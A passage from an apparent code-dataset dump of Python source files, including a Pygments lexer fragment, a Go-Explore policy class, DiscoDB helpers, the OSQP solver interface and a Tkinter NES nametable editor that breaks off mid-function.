(r'((?:[a-z]\\w*/)*)([A-Z]\\w*)',\n bygroups(Name.Namespace, tokenType)),\n (r'((?:[a-z]\\w*/)*)([a-z]\\w+)',\n bygroups(Name.Namespace, tokenType)),\n\n # type keyword operators\n (r'::|->|[.:|]', tokenType),\n\n # catchall\n default('#pop')\n ],\n\n # comments and literals\n 'whitespace': [\n (r'\\n\\s*#.*$', Comment.Preproc),\n (r'\\s+', Text),\n (r'/\\*', Comment.Multiline, 'comment'),\n (r'//.*$', Comment.Single)\n ],\n 'comment': [\n (r'[^/*]+', Comment.Multiline),\n (r'/\\*', Comment.Multiline, '#push'),\n (r'\\*/', Comment.Multiline, '#pop'),\n (r'[*/]', Comment.Multiline),\n ],\n 'litstring': [\n (r'[^\"]+', String.Double),\n (r'\"\"', String.Escape),\n (r'\"', String.Double, '#pop'),\n ],\n 'string': [\n (r'[^\\\\\"\\n]+', String.Double),\n include('escape-sequence'),\n (r'[\"\\n]', String.Double, '#pop'),\n ],\n 'char': [\n (r'[^\\\\\\'\\n]+', String.Char),\n include('escape-sequence'),\n (r'[\\'\\n]', String.Char, '#pop'),\n ],\n 'escape-sequence': [\n (r'\\\\[nrt\\\\\"\\']', String.Escape),\n (r'\\\\x[0-9a-fA-F]{2}', String.Escape),\n (r'\\\\u[0-9a-fA-F]{4}', String.Escape),\n # Yes, \\U literals are 6 hex digits.\n (r'\\\\U[0-9a-fA-F]{6}', String.Escape)\n ]\n }\n"} {"ext": "py", "sha": "1a2f22e3695171a9affdff58faba065f0b5853c3", "content": "import typing\n\nimport gym\n\non_state_change_type = typing.Callable[[\n gym.Space, # State\n gym.Space, # Action\n float, # Reward\n gym.Space, # New state\n bool, # Is done\n typing.Optional[object], # Info\n], type(None)]\n\n\ndef _noop_function(*args, **kwargs):\n pass\n\n\nclass BasePolicy(object):\n \"\"\"A class that represents an exploration policy for Go-Explore\"\"\"\n\n def __init__(self, environment: gym.Env):\n \"\"\"Create exploration policy.\n\n :param environment: OpenAI Gym environment that should be explored\n \"\"\"\n self.environment = environment\n self._on_action = _noop_function\n\n @property\n def on_action(self):\n return self._on_action\n\n @on_action.setter\n def on_action(self, new_on_action: on_state_change_type):\n self._on_action = new_on_action\n\n def _environment_act(self, current_state: gym.Space, action: gym.Space):\n result = self.environment.step(action)\n new_state, reward, done, info = result\n self._on_action(current_state, action, reward, new_state, done, info)\n return result\n\n def explore(self, current_state: gym.Space):\n \"\"\"Explore from current state.\n\n This method should explore from current_state using the exploration\n policy. It can be e.g. random actions, exploration through curiosity,\n etc.\n\n The environment should be in current_state in order for this method to\n work properly.\n\n :param current_state: Current state of the environment\n :returns Latest tuple from env.step call (or None if not explored)\n \"\"\"\n raise NotImplementedError\n"} {"ext": "py", "sha": "1a2f23047ab44cd2c40947ce2e5c48fea538fe5c", "content": "from disco import util\nfrom discodb import DiscoDB, Q\nfrom disco.worker.task_io import task_output_stream\n\ndef Open(url, task=None):\n if task:\n disco_data = task.disco_data\n ddfs_data = task.ddfs_data\n else:\n from disco.settings import DiscoSettings\n settings = DiscoSettings()\n disco_data = settings['DISCO_DATA']\n ddfs_data = settings['DDFS_DATA']\n scheme, netloc, rest = util.urlsplit(url)\n path, rest = rest.split('!', 1) if '!' in rest else (rest, '')\n discodb = DiscoDB.load(open(util.localize(path, disco_data=disco_data,\n ddfs_data=ddfs_data)))\n\n if rest:\n method_name, arg = rest.split('/', 1) if '/' in rest else (rest, None)\n method = getattr(discodb, method_name)\n if method_name in ('metaquery', 'query'):\n return method(Q.urlscan(arg))\n return method(*filter(None, arg))\n return discodb\n\ndef input_stream(fd, size, url, params):\n return Open(url, task=globals().get('Task')), size, url\n\nclass DiscoDBOutput(object):\n def __init__(self, stream, params):\n from discodb import DiscoDBConstructor\n self.discodb_constructor = DiscoDBConstructor()\n self.stream = stream\n self.params = params\n self.path = stream.path\n\n def add(self, key, val):\n self.discodb_constructor.add(key, val)\n\n def close(self):\n def flags():\n return dict((flag, getattr(self.params, flag))\n for flag in ('unique_items', 'disable_compression')\n if hasattr(self.params, flag))\n self.discodb_constructor.finalize(**flags()).dump(self.stream)\n\ndef discodb_output(stream, partition, url, params):\n return DiscoDBOutput(stream, params), 'discodb:{0}'.format(url.split(':', 1)[1])\n\ndiscodb_stream = (task_output_stream, discodb_output)\n"} {"ext": "py", "sha": "1a2f23b7b527dd66060e8951d37926856c5dc26e", "content": "\"\"\"\nPython interface module for OSQP solver v0.6.2.post5\n\"\"\"\nfrom __future__ import print_function\nfrom builtins import object\nimport osqp._osqp as _osqp # Internal low level module\nimport numpy as np\nimport scipy.sparse as spa\nfrom warnings import warn\nfrom platform import system\nimport osqp.codegen as cg\nimport osqp.utils as utils\nimport sys\nimport qdldl\n\n\nclass OSQP(object):\n def __init__(self):\n self._model = _osqp.OSQP()\n\n def version(self):\n return self._model.version()\n\n def setup(self, P=None, q=None, A=None, l=None, u=None, **settings):\n \"\"\"\n Setup OSQP solver problem of the form\n\n minimize 1/2 x' * P * x + q' * x\n subject to l <= A * x <= u\n\n solver settings can be specified as additional keyword arguments\n \"\"\"\n # TODO(bart): this will be unnecessary when the derivative will be in C\n self._derivative_cache = {'P': P, 'q': q, 'A': A, 'l': l, 'u': u}\n\n unpacked_data, settings = utils.prepare_data(P, q, A, l, u, **settings)\n self._model.setup(*unpacked_data, **settings)\n\n def update(self, q=None, l=None, u=None,\n Px=None, Px_idx=np.array([]), Ax=None, Ax_idx=np.array([])):\n \"\"\"\n Update OSQP problem arguments\n \"\"\"\n\n # get problem dimensions\n (n, m) = self._model.dimensions()\n\n # check consistency of the input arguments\n if q is not None and len(q) != n:\n raise ValueError(\"q must have length n\")\n if l is not None:\n if not isinstance(l, np.ndarray):\n raise TypeError(\"l must be numpy.ndarray, not %s\" %\n type(l).__name__)\n elif len(l) != m:\n raise ValueError(\"l must have length m\")\n # Convert values to -OSQP_INFTY\n l = np.maximum(l, -_osqp.constant('OSQP_INFTY'))\n if u is not None:\n if not isinstance(u, np.ndarray):\n raise TypeError(\"u must be numpy.ndarray, not %s\" %\n type(u).__name__)\n elif len(u) != m:\n raise ValueError(\"u must have length m\")\n # Convert values to OSQP_INFTY\n u = np.minimum(u, _osqp.constant('OSQP_INFTY'))\n if Ax is None:\n if len(Ax_idx) > 0:\n raise ValueError(\"Vector Ax has not been specified\")\n else:\n if len(Ax_idx) > 0 and len(Ax) != len(Ax_idx):\n raise ValueError(\"Ax and Ax_idx must have the same lengths\")\n if Px is None:\n if len(Px_idx) > 0:\n raise ValueError(\"Vector Px has not been specified\")\n else:\n if len(Px_idx) > 0 and len(Px) != len(Px_idx):\n raise ValueError(\"Px and Px_idx must have the same lengths\")\n if q is None and l is None and u is None and Px is None and Ax is None:\n raise ValueError(\"No updatable data has been specified\")\n\n # update linear cost\n if q is not None:\n self._model.update_lin_cost(q)\n\n # update lower bound\n if l is not None and u is None:\n self._model.update_lower_bound(l)\n\n # update upper bound\n if u is not None and l is None:\n self._model.update_upper_bound(u)\n\n # update bounds\n if l is not None and u is not None:\n self._model.update_bounds(l, u)\n\n # update matrix P\n if Px is not None and Ax is None:\n self._model.update_P(Px, Px_idx, len(Px))\n\n # update matrix A\n if Ax is not None and Px is None:\n self._model.update_A(Ax, Ax_idx, len(Ax))\n\n # update matrices P and A\n if Px is not None and Ax is not None:\n self._model.update_P_A(Px, Px_idx, len(Px), Ax, Ax_idx, len(Ax))\n\n\n # TODO(bart): this will be unnecessary when the derivative will be in C\n # update problem data in self._derivative_cache\n if q is not None:\n self._derivative_cache[\"q\"] = q\n\n if l is not None:\n self._derivative_cache[\"l\"] = l\n\n if u is not None:\n self._derivative_cache[\"u\"] = u\n\n if Px is not None:\n if Px_idx.size == 0:\n self._derivative_cache[\"P\"].data = Px\n else:\n self._derivative_cache[\"P\"].data[Px_idx] = Px\n\n if Ax is not None:\n if Ax_idx.size == 0:\n self._derivative_cache[\"A\"].data = Ax\n else:\n self._derivative_cache[\"A\"].data[Ax_idx] = Ax\n\n # delete results from self._derivative_cache to prohibit\n # taking the derivative of unsolved problems\n if \"results\" in self._derivative_cache.keys():\n del self._derivative_cache[\"results\"]\n\n def update_settings(self, **kwargs):\n \"\"\"\n Update OSQP solver settings\n\n It is possible to change: 'max_iter', 'eps_abs', 'eps_rel',\n 'eps_prim_inf', 'eps_dual_inf', 'rho'\n 'alpha', 'delta', 'polish',\n 'polish_refine_iter',\n 'verbose', 'scaled_termination',\n 'check_termination', 'time_limit',\n \"\"\"\n\n # get arguments\n max_iter = kwargs.pop('max_iter', None)\n eps_abs = kwargs.pop('eps_abs', None)\n eps_rel = kwargs.pop('eps_rel', None)\n eps_prim_inf = kwargs.pop('eps_prim_inf', None)\n eps_dual_inf = kwargs.pop('eps_dual_inf', None)\n rho = kwargs.pop('rho', None)\n alpha = kwargs.pop('alpha', None)\n delta = kwargs.pop('delta', None)\n polish = kwargs.pop('polish', None)\n polish_refine_iter = kwargs.pop('polish_refine_iter', None)\n verbose = kwargs.pop('verbose', None)\n scaled_termination = kwargs.pop('scaled_termination', None)\n check_termination = kwargs.pop('check_termination', None)\n warm_start = kwargs.pop('warm_start', None)\n time_limit = kwargs.pop('time_limit', None)\n\n # update them\n if max_iter is not None:\n self._model.update_max_iter(max_iter)\n\n if eps_abs is not None:\n self._model.update_eps_abs(eps_abs)\n\n if eps_rel is not None:\n self._model.update_eps_rel(eps_rel)\n\n if eps_prim_inf is not None:\n self._model.update_eps_prim_inf(eps_prim_inf)\n\n if eps_dual_inf is not None:\n self._model.update_eps_dual_inf(eps_dual_inf)\n\n if rho is not None:\n self._model.update_rho(rho)\n\n if alpha is not None:\n self._model.update_alpha(alpha)\n\n if delta is not None:\n self._model.update_delta(delta)\n\n if polish is not None:\n self._model.update_polish(polish)\n\n if polish_refine_iter is not None:\n self._model.update_polish_refine_iter(polish_refine_iter)\n\n if verbose is not None:\n self._model.update_verbose(verbose)\n\n if scaled_termination is not None:\n self._model.update_scaled_termination(scaled_termination)\n\n if check_termination is not None:\n self._model.update_check_termination(check_termination)\n\n if warm_start is not None:\n self._model.update_warm_start(warm_start)\n\n if time_limit is not None:\n self._model.update_time_limit(time_limit)\n\n if max_iter is None and \\\n eps_abs is None and \\\n eps_rel is None and \\\n eps_prim_inf is None and \\\n eps_dual_inf is None and \\\n rho is None and \\\n alpha is None and \\\n delta is None and \\\n polish is None and \\\n polish_refine_iter is None and \\\n verbose is None and \\\n scaled_termination is None and \\\n check_termination is None and \\\n warm_start is None:\n raise ValueError(\"No updatable settings has been specified!\")\n\n def solve(self):\n \"\"\"\n Solve QP Problem\n \"\"\"\n # Solve QP\n results = self._model.solve()\n\n # TODO(bart): this will be unnecessary when the derivative will be in C\n self._derivative_cache['results'] = results\n\n return results\n\n def warm_start(self, x=None, y=None):\n \"\"\"\n Warm start primal or dual variables\n \"\"\"\n # get problem dimensions\n (n, m) = self._model.dimensions()\n\n if x is not None:\n if len(x) != n:\n raise ValueError(\"Wrong dimension for variable x\")\n\n if y is None:\n self._model.warm_start_x(x)\n\n if y is not None:\n if len(y) != m:\n raise ValueError(\"Wrong dimension for variable y\")\n\n if x is None:\n self._model.warm_start_y(y)\n\n if x is not None and y is not None:\n self._model.warm_start(x, y)\n\n if x is None and y is None:\n raise ValueError(\"Unrecognized fields\")\n\n def codegen(self, folder, project_type='', parameters='vectors',\n python_ext_name='emosqp', force_rewrite=False, compile_python_ext=True,\n FLOAT=False, LONG=True):\n \"\"\"\n Generate embeddable C code for the problem\n \"\"\"\n\n # Check parameters arguments\n if parameters == 'vectors':\n embedded = 1\n elif parameters == 'matrices':\n embedded = 2\n else:\n raise ValueError(\"Unknown value of 'parameters' argument.\")\n\n # Set float and long flags\n if FLOAT:\n float_flag = 'ON'\n else:\n float_flag = 'OFF'\n if LONG:\n long_flag = 'ON'\n else:\n long_flag = 'OFF'\n\n # Check project_type argument\n expectedProject = ('', 'Makefile', 'MinGW Makefiles',\n 'Unix Makefiles', 'CodeBlocks', 'Xcode')\n if project_type not in expectedProject:\n raise ValueError(\"Unknown value of 'project_type' argument.\")\n\n if project_type == 'Makefile':\n if system() == 'Windows':\n project_type = 'MinGW Makefiles'\n elif system() == 'Linux' or system() == 'Darwin':\n project_type = 'Unix Makefiles'\n\n # Convert workspace to Python\n sys.stdout.write(\"Getting workspace from OSQP object... \\t\\t\\t\\t\")\n sys.stdout.flush()\n work = self._model._get_workspace()\n print(\"[done]\")\n\n # Generate code with codegen module\n cg.codegen(work, folder, python_ext_name, project_type, compile_python_ext,\n embedded, force_rewrite, float_flag, long_flag)\n\n def derivative_iterative_refinement(self, rhs, max_iter=20, tol=1e-12):\n M = self._derivative_cache['M']\n\n # Prefactor\n solver = self._derivative_cache['solver']\n\n sol = solver.solve(rhs)\n for k in range(max_iter):\n delta_sol = solver.solve(rhs - M @ sol)\n sol = sol + delta_sol\n\n if np.linalg.norm(M @ sol - rhs) < tol:\n break\n\n if k == max_iter - 1:\n warn(\"max_iter iterative refinement reached.\")\n\n return sol\n\n def adjoint_derivative(self, dx=None, dy_u=None, dy_l=None,\n P_idx=None, A_idx=None, eps_iter_ref=1e-04):\n \"\"\"\n Compute adjoint derivative after solve.\n \"\"\"\n\n P, q = self._derivative_cache['P'], self._derivative_cache['q']\n A = self._derivative_cache['A']\n l, u = self._derivative_cache['l'], self._derivative_cache['u']\n\n try:\n results = self._derivative_cache['results']\n except KeyError:\n raise ValueError(\"Problem has not been solved. \"\n \"You cannot take derivatives. \"\n \"Please call the solve function.\")\n\n if results.info.status != \"solved\":\n raise ValueError(\"Problem has not been solved to optimality. \"\n \"You cannot take derivatives\")\n\n m, n = A.shape\n x = results.x\n y = results.y\n y_u = np.maximum(y, 0)\n y_l = -np.minimum(y, 0)\n\n if A_idx is None:\n A_idx = A.nonzero()\n\n if P_idx is None:\n P_idx = P.nonzero()\n\n if dy_u is None:\n dy_u = np.zeros(m)\n if dy_l is None:\n dy_l = np.zeros(m)\n\n # Make sure M matrix exists\n if 'M' not in self._derivative_cache:\n # Multiply second-third row by diag(y_u)^-1 and diag(y_l)^-1\n # to make the matrix symmetric\n inv_dia_y_u = spa.diags(np.reciprocal(y_u + 1e-20))\n inv_dia_y_l = spa.diags(np.reciprocal(y_l + 1e-20))\n M = spa.bmat([\n [P, A.T, -A.T],\n [A, spa.diags(A @ x - u) @ inv_dia_y_u, None],\n [-A, None, spa.diags(l - A @ x) @ inv_dia_y_l]\n ], format='csc')\n delta = spa.bmat([[eps_iter_ref * spa.eye(n), None],\n [None, -eps_iter_ref * spa.eye(2 * m)]],\n format='csc')\n self._derivative_cache['M'] = M\n self._derivative_cache['solver'] = qdldl.Solver(M + delta)\n\n rhs = - np.concatenate([dx, dy_u, dy_l])\n\n r_sol = self.derivative_iterative_refinement(rhs)\n\n r_x, r_yu, r_yl = np.split(r_sol, [n, n+m])\n\n # Extract derivatives for the constraints\n rows, cols = A_idx\n dA_vals = (y_u[rows] - y_l[rows]) * r_x[cols] + \\\n (r_yu[rows] - r_yl[rows]) * x[cols]\n dA = spa.csc_matrix((dA_vals, (rows, cols)), shape=A.shape)\n du = - r_yu\n dl = r_yl\n\n # Extract derivatives for the cost (P, q)\n rows, cols = P_idx\n dP_vals = .5 * (r_x[rows] * x[cols] + r_x[cols] * x[rows])\n dP = spa.csc_matrix((dP_vals, P_idx), shape=P.shape)\n dq = r_x\n\n return (dP, dq, dA, dl, du)\n"} {"ext": "py", "sha": "1a2f24660a7e35fffbe34868aabb5aba18a8303c", "content": "\"\"\"\nBase interface for a reader class\n\"\"\"\nimport numpy as np\nimport logging\nfrom pathlib import Path\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nlogger = logging.getLogger(__name__)\nimport PyFLOTRAN.utils.SubFishModule as subfish\nimport seaborn as sns\n\nclass BaseReader:\n data: np.ndarray # Hint of self.data array\n info: dict\n\n def __init__(self, filename=None, header=False, **kwargs):\n self.filename = Path(filename)\n self.info = {\"reader\": {}}\n self.data = None\n self.header = header\n self.__dict__.update(kwargs)\n self.open_file(filename)\n\n def read_file(self, opened_file):\n \"\"\"\n Reads the data and stores it inside the class\n :return:\n \"\"\"\n pass\n\n def open_file(self, filename):\n with open(filename) as opened_file:\n if self.header:\n opened_file.readline() # For now, skips the header if it has\n self.read_file(opened_file)\n self.build_info()\n\n def read_header(self, opened_file):\n \"\"\"\n Reads the header of the file\n :return:\n \"\"\"\n pass\n\n def get_data(self) -> np.ndarray:\n \"\"\"\n Outputs the read data\n :return:\n \"\"\"\n return np.array(0)\n\n def build_info(self):\n \"\"\"\n Generates a dictionary containing the basic info of the read data\n :return:\n \"\"\"\n self.info = {}\n\n def global_coords_to_local(self, x_local_to_global, y_local_to_global):\n \"\"\"Converts global data coordinates into local\"\"\"\n assert len(self.data.shape) >= 2 and self.data.shape[1] >= 2, \"Error in data shape\"\n self.data[:, 0] -= x_local_to_global\n self.data[:, 1] -= y_local_to_global\n\n def local_coords_to_global(self, x_local_to_global, y_local_to_global):\n \"\"\"Converts local data coordinates into global\"\"\"\n assert len(self.data.shape) >= 2 and self.data.shape[1] >= 2, \"Error in data shape\"\n self.data[:, 0] += x_local_to_global\n self.data[:, 1] += y_local_to_global\n\n def dump_to_csv(self, output_file, delimiter=\",\"):\n \"\"\"\n Writes the data into a csv file\n :param output_file:\n :return:\n \"\"\"\n print(f\"Starting dump into {output_file}\")\n np.savetxt(output_file, self.get_data(), delimiter=delimiter)\n print(f\"The data has been properly exported to the {output_file} file\")\n\n def create_postprocess_dict(self):\n self.postprocessing_dict = Path().cwd() / \"postprocess\"\n self.postprocessing_dict.mkdir(exist_ok=True)\n\n def generate_subfish_data(self, subfish_dict: dict, unit_factor=1/(365 * 24), unit_name='d') -> pd.DataFrame:\n \"\"\"\n This method reads a given subfish dict and returns the calculated results\n Args:\n subfish_dict: dictionary containing subfish module parameters\n unit_factor: factor multiplyin the results (originally computed in seconds)\n Returns:\n Array containing the times and computed values\n \"\"\"\n if not subfish_dict:\n raise AttributeError('Please, provide a suitable subfish dict object')\n tang_sol = subfish.calculate_tang(subfish_dict)\n tang_sol[0] *= unit_factor\n tang_sol_pd = pd.DataFrame({f'Time [{unit_name}]': tang_sol[0],\n 'Result [M]': tang_sol[1]\n }\n )\n return tang_sol_pd\n"} {"ext": "py", "sha": "1a2f2588b7582d94c297c6556a389c0cf55ecef5", "content": "#!/usr/bin/env python\nfrom __future__ import with_statement, division\nfrom Tkinter import Tk, Frame, Button, Canvas, Label, NW\nfrom array import array\nfrom PIL import Image as PILImage, ImageTk, ImageDraw\n\ndef tileFromPlanar(s, opaqueBase=0):\n nPlanes = len(s) // 8\n im = PILImage.new('P', (8, 8))\n pixels = im.load()\n if pixels is None:\n print \"Ouch!\", repr(im)\n for y in range(8):\n planedata = [ord(c) for c in s[y::8]]\n for x in range(8):\n c = 0\n for i in range(nPlanes):\n if planedata[i] & (0x80 >> x):\n c |= 1 << i\n pixels[x, y] = c + opaqueBase if c > 0 else c\n return im\n\ndef renderAttrPicker(tileImg, palette, value):\n im = PILImage.new('P', (128, 32))\n im.putpalette(palette)\n for i in range(4):\n x = i * 32\n t = 0 if i == value else 3\n im.paste(i * 4 + 1, (x + 16, t, x + 32 - t, 16))\n im.paste(i * 4 + 2, (x + t, 16, x + 16, 32 - t))\n im.paste(i * 4 + 3, (x + 16, 16, x + 32 - t, 32 - t))\n im.paste(tileImg.resize((16, 16)), (value * 32, 0))\n #im.show()\n return im\n\ndef renderChrFile(tiledata, palette, opaqueBase=0):\n tiles = [tiledata[i:i + 16] for i in range(0, len(tiledata), 16)]\n rows = [tiles[i:i + 16] for i in range(0, len(tiles), 16)]\n h = len(rows) * 8\n w = 128\n\n im = PILImage.new('P', (w, h))\n y = 0\n #palette = [0, 0, 0, 153, 102, 0, 102, 204, 0, 255, 204, 0]\n im.putpalette(palette)\n for row in rows:\n x = 0\n for tiledata in row:\n tile = tileFromPlanar(tiledata, opaqueBase)\n im.paste(tile, (x, y))\n x += 8\n y += 8\n return im\n\nclass NamFile:\n defaultNESPalette = \\\n \"\\x0f\\x00\\x10\\x30\\x0f\\x12\\x1a\\x30\\x0f\\x1a\\x2c\\x30\\x0f\\x12\\x14\\x30\"\n nesclut = [\n (0x80,0x80,0x80), (0x00,0x00,0xBB), (0x37,0x00,0xBF), (0x84,0x00,0xA6),\n (0xBB,0x00,0x6A), (0xB7,0x00,0x1E), (0xB3,0x00,0x00), (0x91,0x26,0x00),\n (0x7B,0x2B,0x00), (0x00,0x3E,0x00), (0x00,0x48,0x0D), (0x00,0x3C,0x22),\n (0x00,0x2F,0x66), (0x00,0x00,0x00), (0x05,0x05,0x05), (0x05,0x05,0x05),\n\n (0xC8,0xC8,0xC8), (0x00,0x59,0xFF), (0x44,0x3C,0xFF), (0xB7,0x33,0xCC),\n (0xFF,0x33,0xAA), (0xFF,0x37,0x5E), (0xFF,0x37,0x1A), (0xD5,0x4B,0x00),\n (0xC4,0x62,0x00), (0x3C,0x7B,0x00), (0x1E,0x84,0x15), (0x00,0x95,0x66),\n (0x00,0x84,0xC4), (0x11,0x11,0x11), (0x09,0x09,0x09), (0x09,0x09,0x09),\n\n (0xFF,0xFF,0xFF), (0x00,0x95,0xFF), (0x6F,0x84,0xFF), (0xD5,0x6F,0xFF),\n (0xFF,0x77,0xCC), (0xFF,0x6F,0x99), (0xFF,0x7B,0x59), (0xFF,0x91,0x5F),\n (0xFF,0xA2,0x33), (0xA6,0xBF,0x00), (0x51,0xD9,0x6A), (0x4D,0xD5,0xAE),\n (0x00,0xD9,0xFF), (0x66,0x66,0x66), (0x0D,0x0D,0x0D), (0x0D,0x0D,0x0D),\n\n (0xFF,0xFF,0xFF), (0x84,0xBF,0xFF), (0xBB,0xBB,0xFF), (0xD0,0xBB,0xFF),\n (0xFF,0xBF,0xEA), (0xFF,0xBF,0xCC), (0xFF,0xC4,0xB7), (0xFF,0xCC,0xAE),\n (0xFF,0xD9,0xA2), (0xCC,0xE1,0x99), (0xAE,0xEE,0xB7), (0xAA,0xF7,0xEE),\n (0xB3,0xEE,0xFF), (0xDD,0xDD,0xDD), (0x11,0x11,0x11), (0x11,0x11,0x11)\n ]\n\n def __init__(self, chrfilename, palfilename='', namfilename=None):\n self.loadchr(chrfilename)\n self.loadpal(palfilename)\n self.loadnam(namfilename)\n\n def loadchr(self, chrfilename):\n with open(chrfilename, 'rb') as infp:\n chrdata = infp.read(4096)\n self.chrdata = chrdata\n if len(self.chrdata) != 4096:\n raise ValueError(\"not enough data for pattern table\")\n\n def loadpal(self, palfilename):\n self.palfilename = palfilename\n try:\n with open(palfilename, 'rb') as infp:\n pal = infp.read(16)\n if len(paldata) != 16:\n raise ValueError(\"not enough data for palette\")\n except IOError, e:\n import errno\n if e.errno in (errno.ENOENT, errno.EINVAL):\n pal = self.defaultNESPalette\n else:\n raise\n self.clut = []\n for c in pal:\n self.clut.extend(self.nesclut[ord(c) & 0x3F])\n \n def loadnam(self, namfilename):\n print \"namfilename is\", namfilename\n if namfilename is not None:\n try:\n with open(namfilename, 'rb') as infp:\n namdata = infp.read(1152)\n if ((len(namdata) != 1024\n and namdata.startswith('\\x04\\x00'))\n or namfilename.lower().endswith('.pkb')):\n print \"unpacking\"\n namdata = UnPackBits(namdata[2:]).flush().tostring()\n if len(namdata) != 1024:\n raise ValueError(\"not enough data for nametable\")\n self.namdata = array('B', namdata)\n except IOError, e:\n import errno\n if e.errno == errno.ENOENT:\n namfilename = None\n else:\n raise\n if namfilename is None:\n self.namdata = array('B', [0 for i in range(1024)])\n self.namfilename = namfilename\n self.setUnsaved(False)\n\n def setUnsaved(self, isSaved):\n import datetime\n self.unsaved = (datetime.datetime.now()\n if isSaved\n else False)\n\n def savenam(self, namfilename=None):\n if namfilename is None:\n namfilename = self.namfilename\n s = self.namdata.tostring()\n if namfilename.lower().endswith('.pkb'):\n s = \"\\x04\\x00\" + PackBits(s).flush().tostring()\n with open(namfilename, 'wb') as outfp:\n outfp.write(s)\n self.namfilename = namfilename\n self.setUnsaved(False)\n\n def getTile(self, x, y):\n if x < 0 or x >= 32 or y < 0 or y >= 30:\n return None\n nameIdx = y * 32 + x\n tileNo = self.namdata[nameIdx]\n attrIdx = (y >> 2) * 8 + (x >> 2) + 960\n attrShift = ((y & 0x02) << 1) | (x & 0x02)\n attrNo = (self.namdata[attrIdx] >> attrShift) & 0x03\n return (tileNo, attrNo)\n\n def setTile(self, x, y, tileNo, attrNo=None):\n if x < 0 or x >= 32 or y < 0 or y >= 30:\n return\n nameIdx = y * 32 + x\n self.namdata[nameIdx] = tileNo\n if attrNo is not None:\n attrIdx = (y >> 2) * 8 + (x >> 2) + 960\n attrShift = ((y & 0x02) << 1) | (x & 0x02)\n attrByte = (attrNo & 0x03) << attrShift\n attrByte |= self.namdata[attrIdx] & ~(0x03 << attrShift)\n self.namdata[attrIdx] = attrByte\n \n def getTileData(self, tileNo):\n return self.chrdata[tileNo * 16:tileNo * 16 + 16]\n\n def renderTile(self, tileNo, attrNo):\n return tileFromPlanar(self.getTileData(tileNo), attrNo * 4)\n\ndef build_menubar(parent, mbardata):\n from Tkinter import Menu\n menubar = Menu(parent)\n parent.config(menu=menubar)\n menus = []\n for (label, items) in mbardata:\n menu = Menu(menubar)\n menus.append(menu)\n menubar.add_cascade(label=label, menu=menu)\n for item in items:\n if item == '-':\n menu.add_separator()\n else:\n label = item[0]\n underline = label.find('&')\n if underline >= 0:\n label = label[:underline] + label[underline+1:]\n else:\n underline = None\n accelerator = item[2] if len(item) > 2 else None\n menu.add_command(label=label, command=item[1],\n accelerator=accelerator,\n underline=underline)\n return (menubar, menus)\n\nclass TilePicker(Frame):\n def __init__(self, parent, doc, **kw):\n apply(Frame.__init__, (self, parent), kw)\n self.doc = doc\n self.tilePicker = None\n self.attrPicker = None\n self.status = None\n self.curTile = 0\n self.setAttribute(0)\n self.tilePicker = Label(self, image=self.tilePickerPI,\n width=128, borderwidth=0)\n self.tilePicker.grid(row=0,column=0)\n self.tilePicker.bind(\"\", self.tilePickerCallback)\n self.attrPicker = Label(self, image=self.attrPickerPI,\n borderwidth=0)\n self.attrPicker.grid(row=1,column=0)\n self.attrPicker.bind(\"\", self.attrPickerCallback)\n self.status = Label(self)\n self.status.grid(row=2,column=0)\n self.setStatus()\n\n def setAttribute(self, value):\n self.curAttribute = value & 0x03\n self.updateWidgets()\n\n def updateWidgets(self):\n self.tilePickerImage = renderChrFile(self.doc.chrdata,\n self.doc.clut,\n self.curAttribute * 4)\n self.tilePickerPI = ImageTk.PhotoImage(self.tilePickerImage)\n if self.tilePicker is not None:\n self.tilePicker.configure(image=self.tilePickerPI)\n\n previewTile = self.doc.renderTile(self.curTile, self.curAttribute)\n self.attrPickerImage = renderAttrPicker(previewTile,\n self.doc.clut,\n self.curAttribute)\n self.attrPickerPI = ImageTk.PhotoImage(self.attrPickerImage)\n if self.attrPicker is not None:\n self.attrPicker.configure(image=self.attrPickerPI)\n \n self.setStatus()\n\n def setTile(self, tile):\n self.curTile = tile\n self.setAttribute(self.curAttribute)\n\n def setStatus(self):\n if self.status is None:\n return\n label = \"tile $%02x attr %d\" % (self.curTile, self.curAttribute)\n self.status.configure(text=label)\n\n def tilePickerCallback(self, event):\n if event.x >= 0 and event.x < 128 and event.y >= 0 and event.y < 128:\n tileX = event.x // 8\n tileY = event.y // 8\n newTileNo = tileY * 16 + tileX\n #print \"mouse was clicked on tile\", newTileNo\n self.setTile(newTileNo)\n return\n print \"mouse was clicked at (%d, %d)\" % (event.x, event.y)\n\n def attrPickerCallback(self, event):\n if event.x >= 0 and event.x < 128:\n attr = event.x // 32\n #print \"mouse was clicked on attribute\", attr\n self.setAttribute(attr)\n return\n print \"mouse was clicked at (%d, %d)\" % (event.x, event.y)\n\nclass NamDisplay(Canvas):\n def __init__(self, parent, doc, **kw):\n kw['width'] = 512\n kw['height'] = 480\n kw['relief']='raised'\n kw['highlightthickness'] = 0\n apply(Canvas.__init__, (self, parent), kw)\n self.doc = doc\n self.tile = []\n im = PILImage.new('RGB', (32, 32))\n for y in range(15):\n row = []\n for x in range(16):\n tile = ImageTk.PhotoImage(im)\n if True or ((x ^ y) & 1) == 0:\n self.create_image(x * 32, y * 32, image=tile, anchor=NW)\n row.append(tile)\n self.tile.append(row)\n self.updating = False\n self.updScreen()\n\n def updScreen(self):\n self.updating = True\n for y in range(0, 30, 2):\n for x in range(0, 32, 2):\n self.updTile(x, y)\n self.updating = False\n self.update_idletasks()\n\n def updTile(self, x, y):\n if x < 0 or x >= 32 or y < 0 or y >= 30:\n return\n y = y & ~1\n x = x & ~1\n im = PILImage.new('RGB', (32, 32))\n dst = self.tile[y >> 1][x >> 1]\n for y1 in range(2):\n for x1 in range(2):\n (tileNo, attrNo) = self.doc.getTile(x + x1, y + y1)\n tile = self.doc.renderTile(tileNo, attrNo).resize((16, 16))\n tile.putpalette(self.doc.clut)\n im.paste(tile, (x1 * 16, y1 * 16))\n dst.paste(im)\n if not self.updating:\n self.update_idletasks()\n\nclass PackBits():\n def __init__(self, toWrite=''):\n self.bytes = array('b')\n self.closed = False\n self.mode = 'wb'\n self.name = ''\n self.newlines = None\n if toWrite:\n self.write(toWrite)\n\n def close(self):\n self.bytes = None\n self.closed = True\n\n def write(self, s):\n \"\"\"Add a string to the buffer.\"\"\"\n if not self.closed:\n self.bytes.fromstring(s)\n\n def tell(self):\n return len(self.bytes)\n\n def truncate(self, length):\n if not self.closed:\n del self[length:]\n\n def writelines(self, seq):\n \"\"\"Add a sequence of strings to the buffer.\"\"\"\n self.write(''.join(seq))\n\n def flush(self):\n \"\"\"Compress the data to a file.\"\"\"\n i = 0\n base = 0\n out = array('b')\n while base < len(self.bytes):\n\n # measure the run starting at 